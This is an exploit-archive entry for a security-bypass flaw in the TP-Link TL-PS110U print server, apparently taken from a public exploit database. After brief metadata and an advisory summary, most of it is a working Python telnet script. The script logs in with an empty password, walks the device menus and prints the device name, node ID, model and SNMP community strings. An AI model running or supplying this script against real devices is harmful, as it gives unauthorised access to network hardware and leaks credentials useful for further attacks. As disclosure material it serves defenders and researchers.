TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass

Author: SANTHO
type: remote
platform: hardware
port: 
date_added: 2013-06-19 
date_updated: 2015-11-01 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/60682/info

TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks.
http://drupal.org/node/207891

import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Device Name" in i:
        print i.strip()
    if "Node ID" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Manufacture:" in i:
        print i.strip()
    if "Model:" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Community" in i:
        print i.strip()